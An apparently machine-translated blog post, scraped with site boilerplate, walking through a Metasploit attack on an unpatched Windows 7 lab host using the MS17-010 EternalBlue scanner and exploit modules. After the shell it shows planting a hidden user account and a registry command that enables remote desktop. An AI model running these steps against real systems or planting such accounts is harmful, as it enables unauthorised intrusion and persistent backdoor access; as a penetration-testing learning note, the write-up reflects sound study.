2019-9-27: penetration testing, metasploit-framework early exposure

Others 2019-09-28 04:18:20 views: null

Initial use metasploit exploit framework, intrusion obtain permission to acquire win7

Target system: windows7, no fixes

Target ip address: 192.168.20.131

Task: Using ms17-010, eternal blue loophole to obtain control of the target system

1, before using metasploit, Postgresql need to open the database, enter the command service Postgresql start to open service

 

2, enter the command msfconsole, start metasploit, the system displays the msf5 is complete start

 

 

3, is first determined using the plug-in directory, enter the command search ms17-010, determines to use the directory scan widget

 

can be seen,

Auxiliary / Scanner / smb / smb_ms17_010 , this is a scan ms17-010 determine whether there is a script directory of the vulnerability

exploit / windows / smb / ms17_010_eternalblue, this is an exploit script directory

4, after which directories are OK to start the official use, input use  Auxiliary / Scanner / smb / smb_ms17_010, enter the directory scan

 

5, after entering the directory scan, can show options, view the scan parameters to be set

 

6, set parameters, enter commands, set rhosts 192.168.20.131, scan the host to determine

 

7, enter exploit, to determine the presence of the target host can be exploited

 

 8, since it can be used to determine, and it bluntly, huh, input use  exploit / Windows / smb / ms17_010_eternalblue, enter ms17-010 exploits next script, set rhosts 192.168.20.131, set up the attacking host

 

9, run the exploit, start the attack, successfully won, and direct access to the system privileges

 

 

 

10, after winning the shell, of course can do whatever,

net user $ username / add, add a hidden user

net user $ username and password, set up to hide the user's password

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,开启3389端口

11, summary

metasploit-framework is indeed necessary to make the network penetration testing tool that provides a lot of common exploit scripts easy to use test, greatly saves testers time, is excellent, penetration testers to make sure proficient

Finish

 

Guess you like

Origin www.cnblogs.com/sym945/p/11599845.html
Recommended
Apache Doris version 2.0.10 is officially released!
Open Source Daily | Big models go to war; big model unicorns are revealed to be selling themselves; Zhou Hongyi suggests that Google open source all its products; the largest open source AI community provides $10 million to share GPUs
Ranking
JS inheritance and monitoring
[ProblemSolving][Ubuntu][LyX] The selected document class ... requires external files that are not available...
Java threads sharing static variable
balancap/SSD-Tensorflow使用及训练预测自己的数据集
Detailed core ES6
JS --- reverse traversal achieved Array array, the array is connected string
How to Uninstall (or Reinstall) Windows 10’s Ubuntu Bash Shell
Linux modify the hostname method
Charging Specification BC v1.2
node的性能和java对比分析
Daily
More
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)

Code World

© 2018 codetd.com